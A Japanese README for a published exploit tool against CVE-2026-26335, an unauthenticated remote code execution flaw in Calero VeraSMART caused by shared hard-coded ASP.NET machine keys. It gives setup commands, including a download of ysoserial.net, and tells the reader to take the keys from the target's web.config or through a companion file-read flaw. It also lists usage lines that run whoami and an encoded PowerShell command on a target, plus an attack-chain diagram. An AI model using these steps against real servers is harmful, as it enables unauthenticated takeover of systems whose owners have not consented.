
CVE-2026-26335の自動エクスプロイト。静的マシンキーを使用して偽造したASP.NET ViewStateを介した、Calero VeraSMARTにおける重大な未認証RCEです。エンドポイント検出、ペイロード生成、コマンド実行を含みます。
Mohammed Idrees Banyamer セキュリティリサーチャー
CVE‑2026‑26335 は、Calero VeraSMART(2022 R1 より前)における重大な認証不要のリモートコード実行の脆弱性です。
このアプリケーションは、インストール環境間で共有される静的でハードコードされた ASP.NET machine keys を使用しています。
これらのキーを入手した攻撃者は、悪意のある ASP.NET ViewState を偽造し、サーバーサイドのデシリアライゼーション → RCE を引き起こすことができます。
このエクスプロイトは以下を自動化します:
__VIEWSTATEGENERATOR の抽出CWE‑321 — ハードコードされた暗号鍵
VeraSMART の導入環境では、同一の ASP.NET machineKey が再利用されています:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
ある導入環境からキーを入手した攻撃者は、すべての環境を攻撃できます。
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
キーは公開されていません。ターゲットから入手してください:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
または、付随するファイル読み取り脆弱性を介して:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — Critical AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VeraSMART 2022 R1 で修正済み:
回避策:
教育目的および許可を得たテストのみを対象としています。 所有しているシステム、または評価の許可を得たシステムでのみ使用してください。
Mohammed Idrees Banyamer セキュリティリサーチャー
以下の図は、Calero VeraSMART における CVE‑2026‑26335 のエクスプロイトチェーンを示しています。静的 ASP.NET machine keys により、悪意のある ViewState の偽造が可能となり、リモートコード実行につながります。
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]